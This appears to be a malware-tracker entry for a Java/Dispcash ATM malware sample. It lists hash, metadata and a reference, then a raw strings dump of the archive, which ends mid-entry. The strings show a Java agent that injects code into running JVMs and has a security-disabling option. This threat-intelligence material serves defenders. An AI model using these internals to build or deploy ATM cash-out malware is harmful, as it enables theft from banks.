.- - -----÷M÷E÷N÷U÷------------------------------------------------------------- --- ----  -------------.
!  WALL ! STATS ! GOODIES ! YARA ! FAQ ! RSS ! EMV                                                      !
`--------------  - ---  ---------- -------- -------- -------- -------- ----------------- -  ---- ---- --'

                                           ATM MALWARE NOTICE 
                    ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa
 
Date...........: 2019-03-04
Family.........: Java/Dispcash
File name......: cab.file
File size......: 271.63 KB
Type file......: CAB/Archive
Virscan........: VT - HA
PDB Path found.: C:\BUILD_~1\jdk6_45\control\build\WINDOW~1\tmp\sun\com.sun.tools.attach\attach\obj\attach.pdb
Documentation..: https://securelist.com/criminals-atms-and-a-cup-of-coffee/91406/
Additional note: Drop INJX_PURE.jar (0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027)
the dll (attach.dll) is a java attach-JDK module (libs) used as kinda runtime for the jar.

Entropy:


Binary Histogram:



=== Strings === 
File pos Mem pos ID Text ======== ======= == ==== 00000000003C 00000000003C 0 1.txt 000000000052 000000000052 0 attach.dll 00000000006D 00000000006D 0 INJX_PURE.jar 000000000083 000000000083 0 counter=0 00000000008D 00000000008D 0 logoutput=C:\\windows\\temp\\daemon 0000000000B1 0000000000B1 0 verbose=0 000000000109 000000000109 0 !This program cannot be run in DOS mode. 000000000193 000000000193 0 jRich 0000000002A4 0000000002A4 0 .text 0000000002CC 0000000002CC 0 .rdata 0000000002F3 0000000002F3 0 @.data 00000000031C 00000000031C 0 .rsrc 000000000343 000000000343 0 @.reloc 000000000562 000000000562 0 PSSSV 000000000D76 000000000D76 0 u$VWW 000000001398 000000001398 0 Unable to initialize process status helper library 0000000013CC 0000000013CC 0 GetModuleBaseNameA 0000000013E0 0000000013E0 0 EnumProcessModules 0000000013F4 0000000013F4 0 EnumProcesses 000000001404 000000001404 0 PSAPI.DLL 000000001410 000000001410 0 Unable to get address of GetModuleHandle or GetProcAddress 00000000144C 00000000144C 0 IsWow64Process 00000000145C 00000000145C 0 GetProcAddress 00000000146C 00000000146C 0 GetModuleHandleA 000000001480 000000001480 0 kernel32 00000000148C 00000000148C 0 ConnectNamedPipe failed 0000000014A4 0000000014A4 0 ReadFile 0000000014B0 0000000014B0 0 SeDebugPrivilege 0000000014C4 0000000014C4 0 com/sun/tools/attach/AttachNotSupportedException 0000000014F8 0000000014F8 0 Unable to attach to 64-bit process 00000000151C 00000000151C 0 OpenProcess failed 000000001530 000000001530 0 no such process 000000001540 000000001540 0 CreateNamedPipe failed 000000001558 000000001558 0 CreateRemoteThread failed 000000001574 000000001574 0 Insufficient memory or insufficient privileges to attach 0000000015B0 0000000015B0 0 jvm.dll not loaded by target process 0000000015DC 0000000015DC 0 Unable to enqueue operation: the target VM does not support attach mechanism 00000000162C 00000000162C 0 Remote thread failed for unknown reason 000000001654 000000001654 0 WaitForSingleObject failed 000000001670 000000001670 0 VirtualAllocEx failed 000000001688 000000001688 0 Too many arguments 00000000169C 00000000169C 0 _JVM_EnqueueOperation@20 0000000016B8 0000000016B8 0 JVM_EnqueueOperation 000000001764 000000001764 0 C:\BUILD_~1\jdk6_45\control\build\WINDOW~1\tmp\sun\com.sun.tools.attach\attach\obj\attach.pdb 000000001906 000000001906 0 _JNU_NewStringPlatform@8 000000001922 000000001922 0 _JNU_ReleaseStringPlatformChars@12 000000001948 000000001948 0 _JNU_GetStringPlatformChars@12 00000000196A 00000000196A 0 _JNU_ThrowInternalError@8 000000001986 000000001986 0 JDK_LoadSystemLibrary 00000000199E 00000000199E 0 _JNU_ThrowIOExceptionWithLastError@8 0000000019C6 0000000019C6 0 _JNU_ThrowByName@12 0000000019DC 0000000019DC 0 _JNU_ThrowIOException@8 0000000019F4 0000000019F4 0 java.dll 000000001A00 000000001A00 0 AdjustTokenPrivileges 000000001A18 000000001A18 0 LookupPrivilegeValueA 000000001A30 000000001A30 0 ImpersonateSelf 000000001A42 000000001A42 0 OpenThreadToken 000000001A52 000000001A52 0 ADVAPI32.dll 000000001A6A 000000001A6A 0 malloc 000000001A74 000000001A74 0 strcmp File pos Mem pos ID Text ======== ======= == ==== 000000001A7E 000000001A7E 0 memset 000000001A88 000000001A88 0 strncpy 000000001A92 000000001A92 0 strcpy 000000001A9A 000000001A9A 0 MSVCR71.dll 000000001AA8 000000001AA8 0 _initterm 000000001AB4 000000001AB4 0 _adjust_fdiv 000000001AC4 000000001AC4 0 __CppXcptFilter 000000001AD6 000000001AD6 0 _except_handler3 000000001AEA 000000001AEA 0 __dllonexit 000000001AF8 000000001AF8 0 _onexit 000000001B02 000000001B02 0 GetTempPathA 000000001B12 000000001B12 0 GetVolumeInformationA 000000001B2A 000000001B2A 0 GetProcAddress 000000001B3C 000000001B3C 0 CloseHandle 000000001B4A 000000001B4A 0 OpenProcess 000000001B58 000000001B58 0 GetModuleHandleA 000000001B6C 000000001B6C 0 GetLastError 000000001B7C 000000001B7C 0 ConnectNamedPipe 000000001B90 000000001B90 0 ReadFile 000000001B9C 000000001B9C 0 SetLastError 000000001BAC 000000001BAC 0 GetCurrentThread 000000001BC0 000000001BC0 0 GetCurrentProcess 000000001BD4 000000001BD4 0 CreateNamedPipeA 000000001BE8 000000001BE8 0 GetExitCodeThread 000000001BFC 000000001BFC 0 WaitForSingleObject 000000001C12 000000001C12 0 CreateRemoteThread 000000001C28 000000001C28 0 VirtualFreeEx 000000001C38 000000001C38 0 WriteProcessMemory 000000001C4E 000000001C4E 0 VirtualAllocEx 000000001C60 000000001C60 0 DisableThreadLibraryCalls 000000001C7A 000000001C7A 0 KERNEL32.dll 000000001D40 000000001D40 0 attach.dll 000000001D4B 000000001D4B 0 _Java_sun_tools_attach_WindowsAttachProvider_enumProcesses@16 000000001D89 000000001D89 0 _Java_sun_tools_attach_WindowsAttachProvider_initializeProcessStatusHelper@8 000000001DD6 000000001DD6 0 _Java_sun_tools_attach_WindowsAttachProvider_isLibraryLoadedByProcess@16 000000001E1F 000000001E1F 0 _Java_sun_tools_attach_WindowsAttachProvider_tempPath@8 000000001E57 000000001E57 0 _Java_sun_tools_attach_WindowsAttachProvider_volumeFlags@12 000000001E93 000000001E93 0 _Java_sun_tools_attach_WindowsVirtualMachine_closePipe@16 000000001ECD 000000001ECD 0 _Java_sun_tools_attach_WindowsVirtualMachine_closeProcess@16 000000001F0A 000000001F0A 0 _Java_sun_tools_attach_WindowsVirtualMachine_connectPipe@16 000000001F46 000000001F46 0 _Java_sun_tools_attach_WindowsVirtualMachine_createPipe@12 000000001F81 000000001F81 0 _Java_sun_tools_attach_WindowsVirtualMachine_enqueue@32 000000001FB9 000000001FB9 0 _Java_sun_tools_attach_WindowsVirtualMachine_generateStub@8 000000001FF5 000000001FF5 0 _Java_sun_tools_attach_WindowsVirtualMachine_init@8 000000002029 000000002029 0 _Java_sun_tools_attach_WindowsVirtualMachine_openProcess@12 000000002065 000000002065 0 _Java_sun_tools_attach_WindowsVirtualMachine_readPipe@28 0000000026C5 0000000026C5 0 0<0l0 0000000026DD 0000000026DD 0 1!1*121S1f1 0000000026EF 0000000026EF 0 2(2S2u2 000000002705 000000002705 0 3#3*343<3W3\3 00000000271F 00000000271F 0 4P4e4r4 000000002731 000000002731 0 5#5O5 000000002745 000000002745 0 6#60676B6Q6V6[6 000000002767 000000002767 0 8"8m8 00000000277B 00000000277B 0 9+939=9J9]9|9 0000000027AF 0000000027AF 0 :":-:9:E:R:X:_:h:n:}: 0000000027CB 0000000027CB 0 ;f;o;t;y; 0000000027DF 0000000027DF 0 ;&<3<@<M< 0000000027F5 0000000027F5 0 4 4,404<4@4 0000000028FA 0000000028FA 0 Z0X03 File pos Mem pos ID Text ======== ======= == ==== 000000002931 000000002931 0 >0!0 000000002946 000000002946 0 9d@J 0000000029A2 0000000029A2 0 Western Cape1 0000000029B9 0000000029B9 0 Durbanville1 0000000029CF 0000000029CF 0 Thawte1 0000000029E0 0000000029E0 0 Thawte Certification1 0000000029FF 0000000029FF 0 Thawte Timestamping CA0 000000002A19 000000002A19 0 121221000000Z 000000002A28 000000002A28 0 201230235959Z0 000000002A4F 000000002A4F 0 Symantec Corporation100. 000000002A6D 000000002A6D 0 'Symantec Time Stamping Services CA - G20 000000002BA3 000000002BA3 0 ]jxdE 000000002BED 000000002BED 0 &0$0" 000000002BFE 000000002BFE 0 http://ocsp.thawte.com0 000000002C30 000000002C30 0 80604 000000002C3A 000000002C3A 0 .http://crl.thawte.com/ThawteTimestampingCA.crl0 000000002CA8 000000002CA8 0 TimeStamp-2048-10 000000002D93 000000002D93 0 Symantec Corporation100. 000000002DB1 000000002DB1 0 'Symantec Time Stamping Services CA - G20 000000002DDD 000000002DDD 0 121018000000Z 000000002DEC 000000002DEC 0 201229235959Z0b1 000000002E13 000000002E13 0 Symantec Corporation1402 000000002E31 000000002E31 0 +Symantec Time Stamping Services Signer - G40 000000002FCE 000000002FCE 0 g0e0* 000000002FDF 000000002FDF 0 http://ts-ocsp.ws.symantec.com07 00000000300A 00000000300A 0 +http://ts-aia.ws.symantec.com/tss-ca-g2.cer0< 00000000303E 00000000303E 0 50301 000000003048 000000003048 0 +http://ts-crl.ws.symantec.com/tss-ca-g2.crl0( 00000000308E 00000000308E 0 TimeStamp-2048-20 0000000031BF 0000000031BF 0 y3+.{ 0000000031DC 0000000031DC 0 >"hcS 00000000323B 00000000323B 0 VeriSign, Inc.1 000000003254 000000003254 0 VeriSign Trust Network1;09 000000003274 000000003274 0 2Terms of use at https://www.verisign.com/rpa (c)101.0, 0000000032B1 0000000032B1 0 %VeriSign Class 3 Code Signing 2010 CA0 0000000032DB 0000000032DB 0 120706000000Z 0000000032EA 0000000032EA 0 150718235959Z0 000000003312 000000003312 0 California1 000000003326 000000003326 0 Palo Alto1 00000000333B 00000000333B 0 Sun Microsystems, Inc.1>0< 00000000335B 00000000335B 0 5Digital ID Class 3 - Microsoft Software Validation v21 00000000339C 00000000339C 0 Sun Microsystems1 0000000033B7 0000000033B7 0 Sun Microsystems, Inc.0 0000000033FF 0000000033FF 0 Qhkl* 00000000351E 00000000351E 0 90705 000000003528 000000003528 0 /http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D 000000003560 000000003560 0 =0;09 000000003582 000000003582 0 https://www.verisign.com/rpa0 0000000035C0 0000000035C0 0 e0c0$ 0000000035D1 0000000035D1 0 http://ocsp.verisign.com0; 0000000035F6 0000000035F6 0 /http://csc3-2010-aia.verisign.com/CSC3-2010.cer0 0000000037CF 0000000037CF 0 VeriSign, Inc.1 0000000037E8 0000000037E8 0 VeriSign Trust Network1:08 000000003808 000000003808 0 1(c) 2006 VeriSign, Inc. - For authorized use only1E0C 000000003844 000000003844 0 <VeriSign Class 3 Public Primary Certification Authority - G50 000000003885 000000003885 0 100208000000Z 000000003894 000000003894 0 200207235959Z0 0000000038BC 0000000038BC 0 VeriSign, Inc.1 0000000038D5 0000000038D5 0 VeriSign Trust Network1;09 0000000038F5 0000000038F5 0 2Terms of use at https://www.verisign.com/rpa (c)101.0, File pos Mem pos ID Text ======== ======= == ==== 000000003932 000000003932 0 %VeriSign Class 3 Code Signing 2010 CA0 000000003A2E 000000003A2E 0 z;T0S 000000003AA2 000000003AA2 0 i0g0e 000000003AC4 000000003AC4 0 https://www.verisign.com/cps0* 000000003AF0 000000003AF0 0 https://www.verisign.com/rpa0 000000003B2F 000000003B2F 0 [0Y0W0U 000000003B37 000000003B37 0 image/gif0!0 000000003B67 000000003B67 0 #http://logo.verisign.com/vslogo.gif04 000000003B93 000000003B93 0 -0+0) 000000003B9D 000000003B9D 0 #http://crl.verisign.com/pca3-g5.crl04 000000003BCE 000000003BCE 0 (0&0$ 000000003BDF 000000003BDF 0 http://ocsp.verisign.com0 000000003C30 000000003C30 0 VeriSignMPKI-2-80 000000003CB2 000000003CB2 0 G8J-l 000000003DBD 000000003DBD 0 VeriSign, Inc.1 000000003DD6 000000003DD6 0 VeriSign Trust Network1;09 000000003DF6 000000003DF6 0 2Terms of use at https://www.verisign.com/rpa (c)101.0, 000000003E33 000000003E33 0 %VeriSign Class 3 Code Signing 2010 CA 000000003F93 000000003F93 0 cz_V] 000000004070 000000004070 0 Symantec Corporation100. 00000000408E 00000000408E 0 'Symantec Time Stamping Services CA - G2 000000004100 000000004100 0 130326225748Z0# 0000000041EF 0000000041EF 0 P>OTs 0000000041FD 0000000041FD 0 c24 G 00000000420B 00000000420B 0 $1v~WIb 000000004237 000000004237 0 d~eY3 00000000426A 00000000426A 0 META-INF/UT 00000000427D 00000000427D 0 %z\ux 0000000042AD 0000000042AD 0 META-INF/MANIFEST.MFManifest-Version: 1.0 0000000042D8 0000000042D8 0 Ant-Version: Apache Ant 1.9.7 0000000042F7 0000000042F7 0 Created-By: 1.8.0_144-b01 (Oracle Corporation) 000000004327 000000004327 0 Class-Path: lib/tools.jar lib/lib/ 00000000434B 00000000434B 0 X-COMMENT: Main-Class will be added automatically by build 000000004387 000000004387 0 Main-Class: injx2.INJX 00000000439F 00000000439F 0 Agent-Class: injx2.Agent 0000000043B9 0000000043B9 0 Can-Retransform-Classes: true 0000000043D8 0000000043D8 0 Can-Redefine-Classes: true 000000004414 000000004414 0 conf/PK 000000004437 000000004437 0 dynamic/PK 00000000445D 00000000445D 0 injx2/UT 00000000446D 00000000446D 0 #z\ux 00000000449D 00000000449D 0 injx2/Agent$KRunnable.class 0000000045F3 0000000045F3 0 <init> 000000004609 000000004609 0 LineNumberTable 00000000461B 00000000461B 0 LocalVariableTable 000000004636 000000004636 0 KRunnable 000000004643 000000004643 0 InnerClasses 000000004652 000000004652 0 Linjx2/Agent$KRunnable; 000000004677 000000004677 0 Ljava/lang/Exception; 00000000468F 00000000468F 0 input 000000004697 000000004697 0 Ljava/io/FileInputStream; 0000000046B2 0000000046B2 0 origbytes 0000000046C4 0000000046C4 0 definition 0000000046D0 0000000046D0 0 &Ljava/lang/instrument/ClassDefinition; 000000004700 000000004700 0 targetClassInternalForm 00000000471A 00000000471A 0 Ljava/lang/String; 000000004738 000000004738 0 inscount 000000004743 000000004743 0 action 000000004754 000000004754 0 Ljava/io/File; 00000000476A 00000000476A 0 spaths File pos Mem pos ID Text ======== ======= == ==== 000000004773 000000004773 0 [Ljava/lang/String; 000000004789 000000004789 0 StackMapTable 0000000047AB 0000000047AB 0 SourceFile 0000000047B8 0000000047B8 0 Agent.java 0000000047D2 0000000047D2 0 java/lang/Exception 0000000047E8 0000000047E8 0 java/lang/String 0000000047FB 0000000047FB 0 /dev/shm/.AgentCli 000000004810 000000004810 0 /tmp/.AgentCli 000000004821 000000004821 0 c:\windows\temp\.AgentCli 00000000483D 00000000483D 0 c:\temp\.AgentCli 000000004851 000000004851 0 java/lang/StringBuilder 00000000486B 00000000486B 0 APPDATA 000000004882 000000004882 0 \.AgentCli 000000004894 000000004894 0 java/io/File 0000000048B2 0000000048B2 0 java/io/FileInputStream 0000000048E3 0000000048E3 0 Restoring: 000000004935 000000004935 0 $java/lang/instrument/ClassDefinition 000000004979 000000004979 0 java/io/PrintWriter 0000000049F6 0000000049F6 0 injx2/Agent$KRunnable 000000004A0E 000000004A0E 0 java/lang/Object 000000004A21 000000004A21 0 java/lang/Runnable 000000004A36 000000004A36 0 java/lang/Thread 000000004A49 000000004A49 0 sleep 000000004A58 000000004A58 0 java/lang/System 000000004A6B 000000004A6B 0 getenv 000000004A73 000000004A73 0 &(Ljava/lang/String;)Ljava/lang/String; 000000004A9D 000000004A9D 0 append 000000004AA5 000000004AA5 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000004AD6 000000004AD6 0 toString 000000004AE1 000000004AE1 0 ()Ljava/lang/String; 000000004AF8 000000004AF8 0 (Ljava/lang/String;)V 000000004B10 000000004B10 0 exists 000000004B1F 000000004B1F 0 isDirectory 000000004B2D 000000004B2D 0 (Ljava/io/File;)V 000000004B4E 000000004B4E 0 delete 000000004B57 000000004B57 0 injx2/Global 000000004B6D 000000004B6D 0 Ljava/io/BufferedWriter; 000000004B88 000000004B88 0 java/io/BufferedWriter 000000004BA1 000000004BA1 0 write 000000004BA9 000000004BA9 0 flush 000000004BB1 000000004BB1 0 injx2/Agent 000000004BBF 000000004BBF 0 instrumentedClassName 000000004BD7 000000004BD7 0 toeditcount 000000004BE5 000000004BE5 0 toedit 000000004BEE 000000004BEE 0 [Ljava/lang/Class; 000000004C03 000000004C03 0 java/lang/Class 000000004C15 000000004C15 0 getName 000000004C1F 000000004C1F 0 equals 000000004C28 000000004C28 0 (Ljava/lang/Object;)Z 000000004C40 000000004C40 0 Ljava/util/Hashtable; 000000004C58 000000004C58 0 java/util/Hashtable 000000004C73 000000004C73 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000004C9D 000000004C9D 0 clone 000000004CA5 000000004CA5 0 ()Ljava/lang/Object; 000000004CBC 000000004CBC 0 (Ljava/lang/Class;[B)V 000000004CD5 000000004CD5 0 access$000 000000004CE1 000000004CE1 0 (()Ljava/lang/instrument/Instrumentation; 000000004D0C 000000004D0C 0 $java/lang/instrument/Instrumentation 000000004D34 000000004D34 0 redefineClasses 000000004D45 000000004D45 0 *([Ljava/lang/instrument/ClassDefinition;)V File pos Mem pos ID Text ======== ======= == ==== 000000004D73 000000004D73 0 getMessage 000000004D80 000000004D80 0 (Ljava/io/Writer;)V 000000004D96 000000004D96 0 printStackTrace 000000004DA8 000000004DA8 0 (Ljava/io/PrintWriter;)V 000000004DC3 000000004DC3 0 chashes 000000004DCD 000000004DCD 0 hashes2 000000004DD7 000000004DD7 0 chashes2 000000004DE2 000000004DE2 0 instrumentedMethodName 000000004DFB 000000004DFB 0 instrumentedConstructorName 000000004E19 000000004E19 0 instrumentedArgsMap 000000004E2F 000000004E2F 0 acodeinsert 000000004E3D 000000004E3D 0 bcodeinsert 000000004E4B 000000004E4B 0 close 000000004E53 000000004E53 0 verpatch 000000004E5E 000000004E5E 0 scandyna 000000004E69 000000004E69 0 access$100 000000004E76 000000004E76 0 access$200 000000004E82 000000004E82 0 haverunya 000000004E8F 000000004E8F 0 runya 000000004E97 000000004E97 0 hashes3 000000004EA1 000000004EA1 0 chashes3 0000000053DB 0000000053DB 0 injx2/Agent.class 00000000582C 00000000582C 0 KRunnable 000000005839 000000005839 0 InnerClasses 00000000584F 00000000584F 0 Ljava/util/Properties; 000000005868 000000005868 0 instrumentedClassName 000000005880 000000005880 0 [Ljava/lang/String; 000000005896 000000005896 0 instrumentedMethodName 0000000058AF 0000000058AF 0 instrumentedConstructorName 0000000058CD 0000000058CD 0 instrumentedArgsMap 0000000058E3 0000000058E3 0 acodeinsert 0000000058F1 0000000058F1 0 bcodeinsert 0000000058FF 0000000058FF 0 instrumentit 00000000590E 00000000590E 0 toedit 000000005917 000000005917 0 [Ljava/lang/Class; 00000000592C 00000000592C 0 toeditcount 00000000593E 00000000593E 0 allLoadedClasses 000000005951 000000005951 0 cPool 000000005959 000000005959 0 Linjx2/javassist/ClassPool; 000000005977 000000005977 0 conffile 000000005982 000000005982 0 Ljava/lang/String; 000000005997 000000005997 0 global 0000000059A0 0000000059A0 0 hashes 0000000059A9 0000000059A9 0 chashes 0000000059B3 0000000059B3 0 hashes2 0000000059BD 0000000059BD 0 chashes2 0000000059C8 0000000059C8 0 hashes3 0000000059D2 0000000059D2 0 chashes3 0000000059DD 0000000059DD 0 disablesec 0000000059EA 0000000059EA 0 verpatch 0000000059F5 0000000059F5 0 detach 0000000059FD 0000000059FD 0 haverunya 000000005A0A 000000005A0A 0 otroval 000000005A14 000000005A14 0 instrumentation 000000005A25 000000005A25 0 &Ljava/lang/instrument/Instrumentation; 000000005A4F 000000005A4F 0 paths 000000005A57 000000005A57 0 cpaths 000000005A60 000000005A60 0 <init> 000000005A76 000000005A76 0 LineNumberTable 000000005A88 000000005A88 0 LocalVariableTable File pos Mem pos ID Text ======== ======= == ==== 000000005AA4 000000005AA4 0 Linjx2/Agent; 000000005AB4 000000005AB4 0 runya 000000005ABC 000000005ABC 0 concatenate 000000005AC9 000000005AC9 0 ;([Ljava/lang/Object;[Ljava/lang/Object;)[Ljava/lang/Object; 000000005B0C 000000005B0C 0 [Ljava/lang/Object; 000000005B38 000000005B38 0 LocalVariableTypeTable 000000005B51 000000005B51 0 [TClass; 000000005B5B 000000005B5B 0 Signature 000000005B67 000000005B67 0 4<Class:Ljava/lang/Object;>([TClass;[TClass;)[TClass; 000000005B9F 000000005B9F 0 allclass 000000005BB6 000000005BB6 0 Ljava/lang/Exception; 000000005BD3 000000005BD3 0 StackMapTable 000000005BE6 000000005BE6 0 checkinstance 000000005BF5 000000005BF5 0 ,(Ljava/lang/ClassLoader;Ljava/lang/String;)V 000000005C25 000000005C25 0 VALUES3 000000005C2F 000000005C2F 0 Ljava/util/Set; 000000005C41 000000005C41 0 cloader 000000005C4B 000000005C4B 0 Ljava/lang/ClassLoader; 000000005C65 000000005C65 0 lookfor 000000005C6F 000000005C6F 0 insta 000000005C76 000000005C76 0 #Ljava/util/Set<Ljava/lang/String;>; 000000005C9D 000000005C9D 0 patchall 000000005CA8 000000005CA8 0 loaded 000000005CB1 000000005CB1 0 inscount 000000005CBB 000000005CBB 0 container 000000005CC8 000000005CC8 0 mclassloader 000000005CE2 000000005CE2 0 Ljava/io/IOException; 000000005CFA 000000005CFA 0 argsplit 000000005D11 000000005D11 0 [Linjx2/javassist/CtClass; 000000005D2D 000000005D2D 0 signature 000000005D4F 000000005D4F 0 definition 000000005D5B 000000005D5B 0 &Ljava/lang/instrument/ClassDefinition; 000000005D85 000000005D85 0 ctClass 000000005D8F 000000005D8F 0 Linjx2/javassist/CtClass; 000000005DB2 000000005DB2 0 [Linjx2/javassist/CtMethod; 000000005DD0 000000005DD0 0 ctClassMethod 000000005DE0 000000005DE0 0 Linjx2/javassist/CtMethod; 000000005DFD 000000005DFD 0 ctConstructors 000000005E0D 000000005E0D 0 [Linjx2/javassist/CtConstructor; 000000005E3C 000000005E3C 0 someinject 000000005E67 000000005E67 0 loadconf 000000005E77 000000005E77 0 input 000000005E7F 000000005E7F 0 Ljava/io/FileInputStream; 000000005E9B 000000005E9B 0 porthttp 000000005EA6 000000005EA6 0 counter 000000005EB3 000000005EB3 0 setStaticValue 000000005EC3 000000005EC3 0 9(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Object;)V 000000005EFF 000000005EFF 0 className 000000005F0B 000000005F0B 0 fieldName 000000005F18 000000005F18 0 newValue 000000005F23 000000005F23 0 Ljava/lang/Object; 000000005F38 000000005F38 0 field 000000005F40 000000005F40 0 Ljava/lang/reflect/Field; 000000005F5C 000000005F5C 0 oldValue 000000005F67 000000005F67 0 Exceptions 000000005F83 000000005F83 0 appendalldir 000000005F91 000000005F91 0 ,(Ljava/io/File;Linjx2/javassist/ClassPool;)V 000000005FC0 000000005FC0 0 fileEntry 000000005FCD 000000005FCD 0 Ljava/io/File; 000000005FE5 000000005FE5 0 [Ljava/io/File; File pos Mem pos ID Text ======== ======= == ==== 000000006003 000000006003 0 folder 000000006015 000000006015 0 getClassResource 000000006027 000000006027 0 %(Ljava/lang/Class;)Ljava/lang/String; 000000006050 000000006050 0 klass 000000006058 000000006058 0 Ljava/lang/Class; 00000000606C 00000000606C 0 Ljava/lang/Class<*>; 000000006085 000000006085 0 ((Ljava/lang/Class<*>;)Ljava/lang/String; 0000000060B1 0000000060B1 0 IgetClassResource 0000000060C4 0000000060C4 0 =(Ljava/lang/ClassLoader;Ljava/lang/String;)Ljava/lang/String; 00000000610B 00000000610B 0 Ljava/net/URL; 000000006123 000000006123 0 VALUES 000000006132 000000006132 0 insertpaths 00000000613F 00000000613F 0 0(Ljava/lang/String;Linjx2/javassist/ClassPool;)V 000000006173 000000006173 0 pfolder 00000000617D 00000000617D 0 startagent 000000006189 000000006189 0 ;(Ljava/lang/String;Ljava/lang/instrument/Instrumentation;)V 0000000061C7 0000000061C7 0 agentArgs 0000000061DB 0000000061DB 0 errwrite 0000000061E6 0000000061E6 0 Ljava/io/PrintStream; 0000000061FD 0000000061FD 0 agentmain 00000000620A 00000000620A 0 bootstrapLoader 00000000621C 00000000621C 0 Ljava/net/URISyntaxException; 00000000623C 00000000623C 0 agentclasses 00000000624B 00000000624B 0 Ljava/util/jar/JarFile; 00000000626E 00000000626E 0 access$000 00000000627A 00000000627A 0 (()Ljava/lang/instrument/Instrumentation; 0000000062A6 0000000062A6 0 access$100 0000000062B3 0000000062B3 0 access$200 0000000062C0 0000000062C0 0 <clinit> 0000000062CB 0000000062CB 0 SourceFile 0000000062D8 0000000062D8 0 Agent.java 000000006360 000000006360 0 java/lang/Exception 000000006376 000000006376 0 java/util/HashSet 0000000063E1 0000000063E1 0 java/lang/StringBuilder 0000000063FB 0000000063FB 0 Class loaded: 000000006424 000000006424 0 injx2. 000000006437 000000006437 0 javassist. 000000006449 000000006449 0 .class 00000000646A 00000000646A 0 .jar! 000000006479 000000006479 0 .jar/ 000000006488 000000006488 0 file: 0000000064A1 0000000064A1 0 (unknown) 0000000064AF 0000000064AF 0 ERRORCR: 0000000064CB 0000000064CB 0 INJ: 0000000064DA 0000000064DA 0 java/io/IOException 0000000064F0 0000000064F0 0 injx2/Agent 000000006518 000000006518 0 java/util/Hashtable 00000000654A 00000000654A 0 java/io/ByteArrayInputStream 000000006597 000000006597 0 UNDECLARED 0000000065BB 0000000065BB 0 Method: 0000000065D9 0000000065D9 0 Argument: 0000000065F0 0000000065F0 0 Signature: 00000000660B 00000000660B 0 Match! 000000006644 000000006644 0 $java/lang/instrument/ClassDefinition 000000006679 000000006679 0 Injected: 000000006686 000000006686 0 No code to inject! 00000000669B 00000000669B 0 "Error: Native or Abstract method! 0000000066C1 0000000066C1 0 Error: 0000000066CB 0000000066CB 0 java/io/PrintWriter 0000000066EB 0000000066EB 0 java/lang/Class File pos Mem pos ID Text ======== ======= == ==== 0000000066FD 0000000066FD 0 java/lang/String 000000006710 000000006710 0 java/io/FileInputStream 000000006745 000000006745 0 65413 00000000675E 00000000675E 0 runonload 000000006770 000000006770 0 disablesecurity 000000006790 000000006790 0 verbose 00000000679D 00000000679D 0 logoutput 0000000067AF 0000000067AF 0 stdout 0000000067B8 0000000067B8 0 java/io/BufferedWriter 0000000067D1 0000000067D1 0 java/io/OutputStreamWriter 0000000067F8 0000000067F8 0 java/io/FileWriter 000000006812 000000006812 0 Started... 000000006820 000000006820 0 class 000000006828 000000006828 0 method 000000006836 000000006836 0 constructor 000000006844 000000006844 0 instrument 000000006851 000000006851 0 endcode 00000000685A 00000000685A 0 startcode 000000006867 000000006867 0 Class: 000000006870 000000006870 0 Method: 00000000687D 00000000687D 0 injx2.Agent 0000000068B1 0000000068B1 0 Append classpath: 0000000068E1 0000000068E1 0 Location: 0000000068F3 0000000068F3 0 java/io/File 000000006916 000000006916 0 java/io/PrintStream 00000000692C 00000000692C 0 java/io/FileOutputStream 000000006947 000000006947 0 C:\windows\temp\logerrdet2.txt 000000006972 000000006972 0 java.lang.System 000000006985 000000006985 0 security 000000006995 000000006995 0 X_X... 00000000699F 00000000699F 0 java/lang/Thread 0000000069B2 0000000069B2 0 injx2/Agent$KRunnable 0000000069E3 0000000069E3 0 java/util/jar/JarFile 000000006A30 000000006A30 0 $java/lang/instrument/Instrumentation 000000006A5D 000000006A5D 0 java/lang/Object 000000006A78 000000006A78 0 java/net/URISyntaxException 000000006A96 000000006A96 0 java/util/Properties 000000006AC6 000000006AC6 0 java/lang/ClassLoader 000000006ADE 000000006ADE 0 injx2/javassist/CtClass 000000006AF8 000000006AF8 0 injx2/javassist/CtMethod 000000006B13 000000006B13 0 java/lang/SecurityException 000000006B31 000000006B31 0 java/lang/NoSuchFieldException 000000006B51 000000006B51 0 java/lang/ClassNotFoundException 000000006B74 000000006B74 0 "java/lang/IllegalArgumentException 000000006B99 000000006B99 0 java/lang/IllegalAccessException 000000006BBD 000000006BBD 0 injx2/javassist/ClassPool 000000006BD9 000000006BD9 0 java/util/Set 000000006BE9 000000006BE9 0 java/net/URL 000000006BF8 000000006BF8 0 getClass 000000006C03 000000006C03 0 ()Ljava/lang/Class; 000000006C19 000000006C19 0 getComponentType 000000006C2C 000000006C2C 0 java/lang/reflect/Array 000000006C46 000000006C46 0 newInstance 000000006C53 000000006C53 0 &(Ljava/lang/Class;I)Ljava/lang/Object; 000000006C7D 000000006C7D 0 java/lang/System 000000006C8F 000000006C8F 0 arraycopy 000000006C9B 000000006C9B 0 *(Ljava/lang/Object;ILjava/lang/Object;II)V 000000006CC9 000000006CC9 0 getAllLoadedClasses 000000006CDF 000000006CDF 0 ()[Ljava/lang/Class; 000000006CF6 000000006CF6 0 getSystemClassLoader File pos Mem pos ID Text ======== ======= == ==== 000000006D0D 000000006D0D 0 ()Ljava/lang/ClassLoader; 000000006D29 000000006D29 0 getInitiatedClasses 000000006D3E 000000006D3E 0 +(Ljava/lang/ClassLoader;)[Ljava/lang/Class; 000000006D6C 000000006D6C 0 getParent 000000006D79 000000006D79 0 injx2/Global 000000006D88 000000006D88 0 runningclass 000000006D97 000000006D97 0 Ljava/util/Map; 000000006DA9 000000006DA9 0 getName 000000006DB3 000000006DB3 0 ()Ljava/lang/String; 000000006DCA 000000006DCA 0 java/util/Map 000000006DDF 000000006DDF 0 8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 000000006E1B 000000006E1B 0 equals 000000006E24 000000006E24 0 (Ljava/lang/Object;)Z 000000006E3C 000000006E3C 0 java/util/Arrays 000000006E4F 000000006E4F 0 asList 000000006E57 000000006E57 0 %([Ljava/lang/Object;)Ljava/util/List; 000000006E80 000000006E80 0 (Ljava/util/Collection;)V 000000006E9C 000000006E9C 0 hashCode 000000006EAD 000000006EAD 0 java/lang/Integer 000000006EC1 